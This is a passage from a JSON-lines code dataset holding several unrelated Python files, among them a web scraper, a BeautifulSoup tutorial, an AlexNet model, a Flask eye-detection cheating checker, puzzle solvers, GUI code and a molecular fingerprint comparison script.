r\"\\[\"\nt_RBRACKET = r\"\\]\"\n\nt_ignore = r\" \\t\"\n\ndef t_coord(t):\n r\"<.+>\"\n \n fname, lineno = t[1:-1].split(\":\")\n t.lexer.lineno = fname, int(lineno)\n\ndef t_decint(t):\n r\"-?[1-9][0-9]*|0\"\n \n t.type = \"INTEGER\"\n t.value = int(t.value)\n return t\n\ndef t_hexint(t):\n r\"-?0x(?:[1-9a-fA-F][0-9a-fA-F]*|0)\"\n \n t.type = \"INTEGER\"\n t.value = int(t.value, 16)\n return t\n\ndef t_charlit(t):\n r\"'.+'\"\n \n t.type = \"INTEGER\"\n t.value = ord(sub_escs(t.value[1:-1]))\n return t\n\ndef t_NEWLINE(t):\n r\"[\\r\\n]+\"\n \n fname, lineno = t.lexer.lineno\n lineno += len(t.value.replace(\"\\r\\n\", \"\\n\"))\n t.lexer.lineno = fname, lineno\n return t\n\ndef t_REGISTER(t):\n r\"%(?:v[0-7]|a[0-3]|q[01]|sp)\"\n \n t.value = registers.index(t.value[1:])\n return t\n\ndef t_STRING(t):\n r\"\\\".+\\\"\"\n \n t.value = sub_escs(t.value[1:-1])\n return t\n\ndef t_error(t):\n errors.error(t.lineno, \"Invalid character '%s'\" % t.value[0])\n","sub_path":"k750/k750asm/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"169568031","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\ndef exploring(id_commune, id_departement, year, hashmap):\n\ttry:\n\t\tville = requests.get('http://alize2.finances.gouv.fr/communes/eneuro/detail.php?icom='\n\t\t\t+ \"%03d\"%id_commune + '&dep=' + \"%03d\"%id_departement\n\t\t\t+ '&type=BPS¶m=5&exercice=' + str(year) )\n\t\tsoup = BeautifulSoup(ville.text, 'html.parser')\n\n\t\tfor x in soup.find_all('tr') :\n\t\t\tif x.find_all(class_=\"libellepetit\") != [] and \"DEPARTEMENT\" in x.find_all(class_=\"libellepetit\")[0].text:\n\t\t\t\thashmap['departement'].append(x.find_all(class_=\"libellepetit\")[0].text.split(' : ')[1])\n\t\t\t\thashmap['commune'].append(x.find_all(class_=\"G\")[0].text)\n\t\t\t\thashmap['year'].append(year)\n\n\t\t\telif x.find_all(class_=\"libellepetit G\") != [] and \"TOTAL\" in x.find_all(class_=\"libellepetit G\")[0].text:\n\t\t\t\ttitle_M = x.find_all(class_=\"libellepetit G\")[0].text.split('>')[0].split(' = ')[0] + ' (Moyenne de la strate)'\n\t\t\t\ttitle_E = x.find_all(class_=\"libellepetit G\")[0].text.split('>')[0].split(' = ')[0] + ' (Euros par habitant)'\n\n\t\t\t\tif title_E not in hashmap.keys() and title_M not in hashmap.keys():\n\t\t\t\t\tprint(hashmap.keys())\n\t\t\t\t\thashmap[title_M] = x.find_all(class_=\"montantpetit G\")[2].text.replace('\\xa0','')\n\t\t\t\t\thashmap[title_E] = x.find_all(class_=\"montantpetit G\")[1].text.replace('\\xa0','')\n\t\t\t\telse:\n\t\t\t\t\thashmap[title_M].append( x.find_all(class_=\"montantpetit G\")[2].text.replace('\\xa0','') )\n\t\t\t\t\thashmap[title_E].append( x.find_all(class_=\"montantpetit G\")[1].text.replace('\\xa0','') )\n\t\treturn True\n\texcept:\n\t\treturn False\n \nfutur_df = {'year' : [], 'departement' : [], 'commune' : [], 'TOTAL DES PRODUITS DE FONCTIONNEMENT (Euros par habitant)' : [],\n'TOTAL DES PRODUITS DE FONCTIONNEMENT (Moyenne de la strate)' : [], 'TOTAL DES EMPLOIS D\\'INVESTISSEMENT (Moyenne de la strate)' : [],\n'TOTAL DES EMPLOIS D\\'INVESTISSEMENT (Euros par habitant)' : [], 'TOTAL DES CHARGES DE FONCTIONNEMENT (Euros par habitant)' : [],\n'TOTAL DES CHARGES DE FONCTIONNEMENT (Moyenne de la strate)' : [], 'TOTAL DES RESSOURCES D\\'INVESTISSEMENT (Euros par habitant)' : [],\n'TOTAL DES RESSOURCES D\\'INVESTISSEMENT (Moyenne de la strate)' : []}\n\nfor i in range(2010,2014):\n\tfor j in range (74, 77):\n\t\tis_exploring = True\n\t\tfor k in range(1, 10):\n\t\t\tprint('year ' + str(i) + ' departement ' + str(j) + ' commune ' + str(k) )\n\t\t\tis_exploring = exploring(k, j, i, futur_df)\n\t\t\tif not is_exploring:\n\t\t\t\tbreak\n\ndf = pd.DataFrame(futur_df)\ndf.to_csv('test.csv')\n","sub_path":"clement-begotto/Lesson2/exo_dom_02.py","file_name":"exo_dom_02.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"426108507","text":"# BeautifulSoup의 find(), select() \r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nhtml_page = \"\"\"\r\n\r\n

제목 태그

\r\n

웹 문서 읽기

\r\n

원하는 자료 선택

\r\n

\r\n\r\n\"\"\"\r\n\r\n#print(type(html_page)) # \r\n#print(html_page) # html형태를 가진 문자열 \r\n\r\nsoup = BeautifulSoup(html_page, 'html.parser') # BeautifulSoup 객체생성\r\n#print(type(soup)) # BeautifulSoup이 제공하는 명령 사용가능\r\n\r\nh1 = soup.html.body.h1 # soup에 html안에 body안에 h1태그(태그까지)\r\nprint(\"h1 : \", h1.string) # 뽑아온 태그의 내용\r\n\r\np1 = soup.html.body.p # 최초의 p를 만남\r\nprint(\"p1 : \", p1.string)\r\n\r\np2 = p1.next_sibling.next_sibling\r\nprint(\"p2 : \", p2.string)\r\n\r\n\r\nprint(\"\\n\\nfind()를 사용\")\r\nhtml_page2 = \"\"\"\r\n\r\n

제목 태그

\r\n

웹 문서 읽기

\r\n

원하는 자료 선택

\r\n

\r\n\r\n\"\"\"\r\n\r\nsoup2 = BeautifulSoup(html_page2, 'html.parser')\r\nprint(soup2.p, ' ', soup2.p.string) # 직접 최초 tag선택\r\nprint(soup2.find('p').string)\r\nprint(soup2.find('p', id='my').string) # p태그의 id값을 선택해줘 출력\r\nprint(soup2.find_all('p')) # p태그를 전부 불러옴(태그도 같이 가져옴)\r\nprint(soup2.find(id='title').string) # id값만 선택하여 출력\r\nprint(soup2.find(id='my').string)\r\n\r\nprint(\"\\n\\nfind_all(), findAll()를 사용\")\r\nhtml_page3 = \"\"\"\r\n\r\n

제목 태그

\r\n

웹 문서 읽기

\r\n

원하는 자료 선택

\r\n
\r\n naver
\r\n daum
\r\n
\r\n\r\n\"\"\"\r\n\r\nsoup3 = BeautifulSoup(html_page3, 'html.parser')\r\nprint(soup3.find('a'))\r\nprint(soup3.find('a').string)\r\nprint(soup3.find(['a']))\r\nprint(soup3.find_all(['a']))\r\nprint(soup3.findAll(['a']))\r\nprint(soup3.find_all('a'))\r\nprint(soup3.find_all(['a', 'p'])) # a태그, p태그 둘다 가져옴\r\n#print(soup3)\r\n#print(soup3.prettify())\r\n\r\nprint()\r\nlinks = soup3.find_all('a')\r\nprint(links)\r\nfor i in links:\r\n href = i.attrs['href']\r\n text = i.string\r\n print(href, ' ', text)\r\n \r\nprint('\\n\\nfind() 정규 표현식 사용')\r\nimport re\r\n# https로 시작되는 데이터 \r\nlink2 = soup3.find_all(href=re.compile(r'^https'))\r\nprint(link2)\r\nfor k in link2:\r\n print(k.attrs['href'])\r\n\r\nprint(\"\\n\\nselect()사용 (css의 selector)\")\r\nhtml_page4 = \"\"\"\r\n\r\n
\r\n naver
\r\n \r\n daum\r\n
\r\n \r\n
    \r\n
  • 안녕
  • \r\n
  • 반가워
  • \r\n
\r\n
\r\n
\r\nsecond div\r\n
\r\n\r\n\r\n\"\"\"\r\nsoup4 = BeautifulSoup(html_page4, 'lxml')\r\naa = soup4.select_one(\"div#hello a\").string # 모든 \"div#hello a\" a태그를 읽어와야 하지만 select_one이라 하나만 읽음 \r\n#aa = soup4.select_one(\"div#hello > a\").string # 직계 바로 아래 자식에 존재하는 a태그만\r\nprint('aa : ', aa)\r\n\r\nbb = soup4.select(\"div#hello ul.world > li\") # 복수 선택 # div#hello ul : 자손 div#hello > ul : 직계\r\nprint('bb : ', bb) # bb : [
  • 안녕
  • ,
  • 반가워
  • ]\r\nfor i in bb:\r\n print('li : ', i.string)\r\n\r\n","sub_path":"python_Analysis1/pandas_test/pdex7.py","file_name":"pdex7.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"534770251","text":"import streamlit as st\nfrom dashboard.components import SideBar, MainArea\n\nfrom data.stocks import StockData\n\n# Configuration\nst.set_page_config(\n page_title=\"Stonks\",\n page_icon=\"🧊\",\n layout=\"wide\",\n initial_sidebar_state=\"expanded\",\n)\n\nstock_data = StockData()\nside_bar = SideBar(stock_data)\nstock_plot = MainArea(side_bar, stock_data)\nstock_plot.plot_history()\nstock_plot.plot_technical_indicators()\nstock_plot.plot_financials()\n","sub_path":"stonks/stonks.py","file_name":"stonks.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"241203984","text":"import tensorflow as tf\n\ndef AlexNet(x, keep_prob, num_classes):\n # 第一层: Conv (w ReLu) -> Lrn -> Pool\n conv1 = conv(x, 11, 11, 96, 4, 4, padding='VALID', name='conv1')\n norm1 = lrn(conv1, 2, 2e-05, 0.75, name='norm1')\n pool1 = max_pool(norm1, 3, 3, 2, 2, padding='VALID', name='pool1')\n \n # 第二层: Conv (w ReLu) -> Lrn -> Pool with 2 groups\n conv2 = conv(pool1, 5, 5, 256, 1, 1, groups=2, name='conv2')\n norm2 = lrn(conv2, 2, 2e-05, 0.75, name='norm2')\n pool2 = max_pool(norm2, 3, 3, 2, 2, padding='VALID', name='pool2')\n \n # 第三层: Conv (w ReLu)\n conv3 = conv(pool2, 3, 3, 384, 1, 1, name='conv3')\n\n # 第四层: Conv (w ReLu) \n conv4 = conv(conv3, 3, 3, 384, 1, 1, groups=2, name='conv4')\n\n # 第五层: Conv (w ReLu) -> Pool 拆分两组 \n conv5 = conv(conv4, 3, 3, 256, 1, 1, groups=2, name='conv5')\n pool5 = max_pool(conv5, 3, 3, 2, 2, padding='VALID', name='pool5')\n\n # 第六层: Flatten -> FC (w ReLu) -> Dropout\n flattened = tf.reshape(pool5, [-1, 6*6*256])\n fc6 = fc(flattened, 6*6*256, 4096, name='fc6')\n dropout6 = dropout(fc6, keep_prob)\n\n # 第七层: FC (w ReLu) -> Dropout\n fc7 = fc(dropout6, 4096, 4096, name='fc7')\n dropout7 = dropout(fc7, keep_prob)\n\n # 第八层全连接层没有 relu激活层: FC \n fc8 = fc(dropout7, 4096, num_classes, relu = False, name='fc8')\n return fc8\n\ndef conv(x, filter_height, filter_width, num_filters, stride_y, stride_x, name,\n padding='SAME', groups=1):\n # 输入通道数数量 \n input_channels = int(x.get_shape()[-1])\n\n # 创建权重和偏差值 \n with tf.variable_scope(name) as scope:\n weights = tf.get_variable('weights', shape=[filter_height,\n filter_width,\n input_channels/groups,\n num_filters])\n biases = tf.get_variable('biases', shape=[num_filters])\n\n if groups == 1:\n conv = tf.nn.conv2d(x, weights,\n strides=[1, stride_y, stride_x, 1],\n padding=padding)\n # 在有多组的情况下,拆分输入权重\n else:\n # 拆分输入和权重并进行卷积\n input_x = tf.split(axis=3, num_or_size_splits=groups, value=x)\n weight_w = tf.split(axis=3, num_or_size_splits=groups,\n value=weights)\n output_groups = []\n for i, k in zip(input_x, weight_w):\n output_conv2d = tf.nn.conv2d(i, k,\n strides=[1, stride_y, stride_x, 1],\n padding=padding)\n output_groups.append(output_conv2d)\n # 创建连接 \n conv = tf.concat(axis=3, values=output_groups)\n\n # 偏差值 \n bias = tf.reshape(tf.nn.bias_add(conv, biases), tf.shape(conv))\n\n # 激活函数Relu \n relu = tf.nn.relu(bias, name=scope.name)\n return relu\n\n# 创建全连接层\ndef fc(x, num_in, num_out, name, relu=True):\n with tf.variable_scope(name) as scope:\n # 创建权重和偏差值 \n weights = tf.get_variable('weights', shape=[num_in, num_out],\n trainable=True)\n biases = tf.get_variable('biases', [num_out], trainable=True)\n\n # 计算多个输入,权重,偏差值 \n act = tf.nn.xw_plus_b(x, weights, biases, name=scope.name)\n if relu == True:\n return tf.nn.relu(act)\n else:\n return act\n\n# 创建max_pool最大池化层\ndef max_pool(x, filter_height, filter_width, stride_y, stride_x, name,\n padding='SAME'):\n return tf.nn.max_pool(x, ksize=[1, filter_height, filter_width, 1],\n strides=[1, stride_y, stride_x, 1],\n padding=padding, name=name)\n\n# 创建 LRN 层\ndef lrn(x, radius, alpha, beta, name, bias=1.0):\n return tf.nn.local_response_normalization(x, depth_radius=radius,\n alpha=alpha, beta=beta,\n bias=bias, name=name)\n\n# 创建dropout层\ndef dropout(x, keep_prob):\n return tf.nn.dropout(x, rate=1-keep_prob)","sub_path":"Alexnet实现猫狗分类/alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"446811035","text":"from django.contrib import admin\nfrom .models import Webcrafting, CallBack\n\nclass WebcraftingModelAdmin(admin.ModelAdmin):\n class Meta:\n model = Webcrafting\n\n list_display = [\"title\", \"portfolio_updated\", \"portfolio_time\"]\n list_filter = [\"portfolio_updated\", \"portfolio_time\"]\n\nclass WebcraftingModelAdminContactForm(admin.ModelAdmin):\n class Meta:\n model = CallBack\n\n list_display = [\"your_name\",\n \"your_email\",\n \"your_phone\",\n \"your_message\",\n \"contact_time\",\n \"contact_updated\",\n \"checked\"]\n list_filter = [\"contact_updated\", \"contact_time\", \"checked\"]\n\n\nadmin.site.register(Webcrafting, WebcraftingModelAdmin)\nadmin.site.register(CallBack, WebcraftingModelAdminContactForm)\n","sub_path":"portfolio/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"576832684","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[32]:\n\n\nfrom flask import Flask, request, jsonify\nimport cv2, glob, sys, os\n#from PIL import Image\n#from flask_restful import Resource, Api\n \napp = Flask(__name__)\n\n@app.route('/cheat/', methods=['GET'])\ndef respond():\n # Retrieve the name from url parameter\n path = request.args.get(\"path\", None)\n \n p=os.path.split(path)[0]\n path1 = p +\"/\"+ \"cheat\" + \"/\"\n print(path1)\n \n try:\n os.mkdir(path1)\n except OSError:\n print (\"Creation of the directory %s failed\" % path1)\n else:\n print (\"Successfully created the directory %s \" % path1)\n \n # For debugging\n print(f\"got path {path}\")\n response = {}\n cheat_bool = 0\n cheating_attempts = 0\n a=[]\n compression_factor = [cv2.IMWRITE_PNG_COMPRESSION, 9]\n eye_cascade_path = \"haarcascade_eye.xml\"\n eye_cascade = cv2.CascadeClassifier(eye_cascade_path)\n for file in glob.glob(path):\n frame= cv2.imread(file)\n yuv = cv2.cvtColor(frame, cv2.COLOR_BGR2YUV)\n yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0])\n bgr_frame = cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR)\n gray = cv2.cvtColor(bgr_frame, cv2.COLOR_BGR2GRAY)\n clahe = cv2.createCLAHE(clipLimit=40.0, tileGridSize=(8, 8))\n gray = clahe.apply(gray)\n eyes = eye_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)\n for (x, y, width, height) in eyes:\n cv2.rectangle(frame, (x, y), (x + width, y + height), (0, 255, 0), 2)\n break\n if len(eyes) == 0:\n cheat_bool = 1\n else:\n gray_cropped_right = gray[eyes[0][1]: eyes[0][1] + eyes[0][3],\n eyes[0][0] + eyes[0][2] // 2: eyes[0][0] + eyes[0][2]]\n cv2.GaussianBlur(gray_cropped_right, (3, 3), 16)\n\n if cheat_bool == 1:\n cheating_attempts += 1\n # cheating_attempts.append\n b= os.path.splitext(os.path.basename(file))[0]\n a.append(b)\n \n y = cv2.resize(frame, (128, 72), interpolation = cv2.INTER_AREA)\n cv2.imwrite(path1 + str(os.path.splitext(os.path.basename(file))[0]) + \"_cheat\" + \".png\", y, compression_factor)#working\n # Reset value of cheat_bool to catch further such instances - in case they happen\n cheat_bool = 0\n\n # Return the response in json format\n return jsonify(a)\n\n@app.route('/post/', methods=['POST'])\ndef post_something():\n param = request.form.get('path')\n print(param)\n \n@app.route('/')\ndef index():\n return \"

    To test go to http://127.0.0.1:5000/cheat/?path=[yourdirectory]!!

    \"\n\nif __name__ == '__main__':\n # Threaded option to enable multiple instances for multiple user access support\n app.run(threaded=True, port=5000)\n\n\n# In[20]:\n\n\n#print(os.path.splitext(os.path.basename(path))[0])\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"autoinvig.py","file_name":"autoinvig.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"374186216","text":"class Solution:\n # @return a list of lists of string\n def solveNQueens(self, n):\n self.ret=[]\n board=[[\".\" for i in xrange(n) ] for i in xrange(n) ]\n self.solve(board,0,n)\n return self.ret\n\n def solve(self, board, m, n):\n if m==n:\n result=[''.join(i) for i in board]\n self.ret.append(result)\n return\n for i in xrange(n):\n canput=True\n for j in range(0,m):\n if board[j][i]==\"Q\": canput=False\n for j in range(1,min(i+1,m+1)):\n if board[m-j][i-j]==\"Q\": canput=False\n for j in range(1,min(n-i,m+1)):\n if board[m-j][i+j]==\"Q\": canput=False\n if canput:\n board[m][i]=\"Q\"\n self.solve(board,m+1,n)\n board[m][i]=\".\"\n\n \n\n\n\na=Solution()\na.solveNQueens(4)\n\n","sub_path":"python/questiones/051_nqueens.py","file_name":"051_nqueens.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"529212831","text":"#-*- coding:utf-8 -*-\n\nimport tkinter as tk # python 3\nfrom tkinter import font as tkfont # python 3\nfrom start_page import StartPage\nfrom detect_page import *\nfrom manual_page import *\nfrom auto_page import AutoPage\nfrom spray_mode import *\n\nclass MainApp(tk.Tk):\n\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n\n #이미지 관리\n imgBgEmpty = tk.PhotoImage(file='images/bg_empty.png')\n imgBgDetect = tk.PhotoImage(file='images/bg_detect.png')\n imgBgAuto = tk.PhotoImage(file='images/bg_auto.png')\n imgBgManual = tk.PhotoImage(file='images/bg_manual.png')\n self.imgBtnBack = tk.PhotoImage(file='images/btnBack.png')\n\n if platform.system() == \"Linux\":\n wpi.wiringPiSetup()\n wpi.pinMode(4, 1)\n \n self.sprayMode = SprayMode.MANUAL\n\n # the container is where we'll stack a bunch of frames\n # on top of each other, then the one we want visible\n # will be raised above the others\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n if platform.system() == \"Linux\":\n container.config(cursor=\"none\")\n\n self.attributes()\n\n self.frames = {}\n for F in (StartPage, DetectPage, ManualPage, AutoPage):\n page_name = F.__name__\n if F == StartPage:\n bg_img = imgBgEmpty\n elif F == DetectPage:\n bg_img = imgBgDetect \n elif F == ManualPage:\n bg_img = imgBgManual\n elif F == AutoPage:\n bg_img = imgBgAuto\n\n frame = F(parent=container, controller=self, background_img=bg_img)\n self.frames[page_name] = frame\n\n # put all of the pages in the same location;\n # the one on the top of the stacking order\n # will be the one that is visible.\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(\"StartPage\")\n\n def show_frame(self, page_name):\n '''Show a frame for the given page name'''\n frame = self.frames[page_name]\n if page_name == 'ManualPage':\n frame.spray_on_check = False\n frame.init_spray()\n frame.change_spray_btn()\n\n frame.tkraise()\n\n def setSprayMode(self, sprayMode):\n self.sprayMode = sprayMode\n\nif __name__ == \"__main__\":\n app = MainApp()\n app.title(\"천연살균의학처 방역 시스템\")\n app.geometry(\"1024x600\")\n \n if platform.system() == \"Linux\":\n app.attributes(\"-fullscreen\",True)\n \n app.resizable(False, False)\n app.mainloop()","sub_path":"nsc_app.py","file_name":"nsc_app.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"277417125","text":"from dataclasses import dataclass\n\nclass Grid:\n def __init__(self, initial_2d_slice):\n self.grid = {0: {0: self.parse(initial_2d_slice)}}\n self.xbounds = [0, len(self.grid[0][0][0])]\n self.ybounds = [0, len(self.grid[0][0])]\n self.zbounds = [0, 1]\n self.wbounds = [0, 1]\n\n def parse(self, string):\n grid_2d = {}\n for index, line in enumerate(string.strip().split('\\n')):\n grid_2d[index] = {i: (ch == '#') for i, ch in enumerate(line)}\n return grid_2d\n\n def cycle(self):\n newgrid = {}\n for w in self.bigger_range(*self.wbounds):\n newgrid[w] = {}\n for z in self.bigger_range(*self.zbounds):\n newgrid[w][z] = {}\n for y in self.bigger_range(*self.ybounds):\n newgrid[w][z][y] = {}\n for x in self.bigger_range(*self.xbounds):\n cube = self[x, y, z, w]\n neighbour_count = list(self.neighbours_of(x, y, z, w)).count(True)\n if cube:\n if neighbour_count == 2 or neighbour_count == 3:\n newgrid[w][z][y][x] = True\n else:\n newgrid[w][z][y][x] = False\n else:\n if neighbour_count == 3:\n newgrid[w][z][y][x] = True\n else:\n newgrid[w][z][y][x] = False\n \n self.grid = newgrid\n self.xbounds = [self.xbounds[0]-1, self.xbounds[1]+1]\n self.ybounds = [self.ybounds[0]-1, self.ybounds[1]+1]\n self.zbounds = [self.zbounds[0]-1, self.zbounds[1]+1]\n self.wbounds = [self.wbounds[0]-1, self.wbounds[1]+1]\n\n def neighbours_of(self, x, y, z, w):\n for w_offset in range(-1, 2):\n if w + w_offset in range(*self.wbounds):\n for z_offset in range(-1, 2):\n if z + z_offset in range(*self.zbounds):\n for y_offset in range(-1, 2):\n if y + y_offset in range(*self.ybounds):\n for x_offset in range(-1, 2):\n if x + x_offset in range(*self.xbounds) and not (w_offset == z_offset == y_offset == x_offset == 0):\n yield self[x + x_offset,\n y + y_offset,\n z + z_offset,\n w + w_offset]\n\n def bigger_range(self, *bounds):\n yield min(bounds) - 1\n yield from range(*bounds)\n yield max(bounds)\n\n def count_active(self):\n count = 0\n for w in range(*self.wbounds):\n for z in range(*self.zbounds):\n for y in range(*self.ybounds):\n for x in range(*self.xbounds):\n if self[x, y, z, w]:\n count += 1\n return count\n\n def __getitem__(self, index):\n x, y, z, w = index\n try:\n return self.grid[w][z][y][x]\n except KeyError:\n return False\n\n def __str__(self):\n s = \"\"\n for w in sorted(self.grid.keys()):\n for z in sorted(self.grid[w].keys()):\n s += f\"z={z}, w={w}\\n\"\n for y in sorted(self.grid[w][z].keys()):\n s += \"\".join(('#' if self.grid[w][z][y][x] else '.') for x in sorted(self.grid[w][z][y].keys()))\n s += \"\\n\"\n s += \"\\n\"\n return s\n\n\nwith open(\"day17.in\") as f:\n grid = Grid(f.read())\n\nfor _ in range(6):\n grid.cycle()\nprint(grid.count_active())\n","sub_path":"day17_pt2.py","file_name":"day17_pt2.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"250121889","text":"from transformers import AutoModelForSequenceClassification, AutoConfig\nimport os\nimport time\nfrom tqdm import tqdm\nimport torch\nfrom torch.optim import AdamW\nfrom sklearn.metrics import accuracy_score\nimport torch.nn as nn\n\nclass BiRNN(nn.Module):\n def __init__(self, vocab_size, num_labels):\n \n super().__init__()\n \n self.embedding = nn.Embedding(vocab_size, 128)\n self.bigru = nn.GRU(128, 256, bidirectional=True)\n self.fc = nn.Linear(512, num_labels)\n self.num_labels = num_labels\n \n def forward(self, \n input_ids,\n labels):\n\n embedded = self.embedding(input_ids) \n out = self.bigru(embedded)\n logits = self.fc(out[0][:,0,:])\n loss = self.compute_loss(logits, labels)\n return {'loss':loss,\n 'logits':logits} \n \n def compute_loss(self, logits, labels):\n loss_fct = nn.CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels)\n return loss\n\nclass BaseModel:\n def __init__(self, config):\n self.model = nn.Module()\n self.num_labels = config['num_labels']\n self.model_name = config['model_name']\n self.vocab_size = config['vocab_size']\n\n self.device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n def train(self, datasets, epochs = 30, save_dir = '.'):\n train_dataset, valid_dataset, test_dataset = datasets \n filepath = os.path.join(save_dir, 'model.pth')\n best_accuracy = 0 \n for epoch in range(epochs):\n accuracy = 0 \n loss = 0 \n self.model.train().to(self.device)\n for _, batch in enumerate(train_dataset):\n batch = {k: v.to(self.device) for k, v in batch.items()}\n outputs = self.model(**batch)\n loss = outputs['loss']\n loss.backward()\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n labels = batch['labels'].cpu() \n preds = outputs['logits'].argmax(-1).cpu() \n accuracy += accuracy_score(labels, preds) /len(train_dataset)\n loss += loss / len(train_dataset)\n \n print(f\"Epoch {epoch} Train Loss {loss:.4f} Train Accuracy {accuracy:.4f}\")\n \n self.model.eval().to(self.device)\n results = self.evaluate_dataset(valid_dataset)\n print(f\"Epoch {epoch} Valid Loss {results['loss']:.4f} Valid Accuracy {results['accuracy']:.4f}\")\n\n val_accuracy = results['accuracy']\n if val_accuracy > best_accuracy:\n best_accuracy = val_accuracy\n torch.save(self.model.state_dict(), filepath)\n\n #Later to restore:\n \n self.model.load_state_dict(torch.load(filepath))\n self.model.eval()\n results = self.evaluate_dataset(test_dataset)\n print(f\"Test Loss {results['loss']:.4f} Test Accuracy {results['accuracy']:.4f}\")\n \n def evaluate_dataset(self, dataset):\n accuracy = 0\n loss = 0 \n for _, batch in enumerate(dataset):\n batch = {k: v.to(self.device) for k, v in batch.items()}\n outputs = self.model(**batch)\n loss = outputs['loss']\n labels = batch['labels'].cpu() \n preds = outputs['logits'].argmax(-1).cpu() \n accuracy += accuracy_score(labels, preds) /len(dataset)\n loss += loss / len(dataset)\n return {'loss':loss, 'accuracy':accuracy}\n\nclass SimpleClassificationModel(BaseModel):\n def __init__(self, config):\n BaseModel.__init__(self, config)\n self.model = BiRNN(self.vocab_size, self.num_labels)\n self.model.to(self.device) \n self.optimizer = AdamW(self.model.parameters(), lr=5e-5)\n\nclass BERTClassificationModel(BaseModel):\n def __init__(self, config):\n BaseModel.__init__(self, config)\n config = AutoConfig.from_pretrained(self.model_name,num_labels=self.num_labels)\n self.model = AutoModelForSequenceClassification.from_pretrained(self.model_name, config = config)\n self.optimizer = AdamW(self.model.parameters(), lr=5e-5)","sub_path":"nmatheg/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"100907972","text":"import pybel\nimport openbabel\nimport datetime\nimport os\nimport sys\nimport re\nimport time\nimport multiprocessing \nfrom multiprocessing import Pool\n\nnow = datetime.datetime.now()\n\ndef readFoldFile(fold):\n foldList = open(fold,'r').readlines()\n list2 = foldList\n tempLine = \"\"\n counter = 0\n for line in list2:\n tempLine = line.rstrip(\"\\n\")\n tempLine = tempLine.rstrip()\n line = tempLine\n list2[counter] = tempLine\n counter=counter+1\n return list2\n\n\n\n\ndef getFingerprintHM(csvData,dataPath,fileCol):\n data = open(csvData,'r')\n fingerprints = dict()\n counter = 0\n totalCounter = 0\n \n for line in data:\n tempLine = line.rstrip(\"\\n\")\n tempLine = tempLine.rstrip()\n line = tempLine\n\n cols = line.split(\", \")\n cols[0] = cols[0].rstrip()\n cols[1] = cols[1].rstrip()\n try:\n ms = pybel.readfile(\"sdf\",dataPath+cols[0])\n print(ms)\n output = list()\n fpsList = list()\n for m in ms: \n fp = m.calcfp()\n fpsList.append(fp)\n if len(fpsList)>0:\n fingerprints[cols[0]+\" \"+cols[1]] = fpsList\n counter = counter + 1\n totalCounter = totalCounter+1\n except:\n pass\n return fingerprints\n\n\n\n\n\ndef createFoldList(fingerprints, fold):\n foldList = list()\n for fps in fingerprints:\n for fp in fps:\n foldList.append(fp)\n\n\n\n\ndef compareFolds(fingerprintHM, fold1, fold2):\n\n strongestLink = list()\n weakestLink = list()\n for i in range(0,2):\n weakestLink.append(\"\")\n strongestLink.append(\"\")\n \n weakestLinkVal = float('inf');\n strongestLinkVal = float('-inf');\n simTotal = 0\n fold1List = readFoldFile(fold1)\n fold2List = readFoldFile(fold2)\n ms = \"\"\n counter = 0\n #valuesAccountedFor = 0\n extremeVals = [float('inf'),float('-inf'),0,0]\n\n\n for line in fold1List:\n print(line)\n #print(str(extremeVals[0])+\" \"+str(extremeVals[1]),str(int((counter/len(fold1List))*100)))\n counter = counter+1\n\n cols = line.split(\" \")\n ms = cols[3].rstrip(\"\\n\")\n ms = ms.rstrip()\n cols[1].rstrip()\n ms = ms+\" \"+cols[1]\n if ms in fingerprintHM:\n extremeVals = compareToSecondFold(fingerprintHM,ms,fold2List,extremeVals)\n \n output = \"For partitions: \"+ fold1 + \" and \"+ fold2+\"\\nAverage Similaraity: \"+str(float(extremeVals[3])/float(extremeVals[2]))+\"\\nstrongest link: \" + str(extremeVals[1]) +\"\\nweakest link: \"+str(extremeVals[0])+\"\\n\\n\"\n print(output)\n return output\n\n\n\n\n\ndef compareToSecondFold(fingerprintHM, ms,fold2List,extremeVals):\n for line2 in fold2List:\n cols2 = line2.split(\" \")\n ms2 = cols2[3].rstrip()+\" \"+cols2[1].rstrip()\n if ms2 in fingerprintHM:\n sim = fingerprintHM[ms][0] | 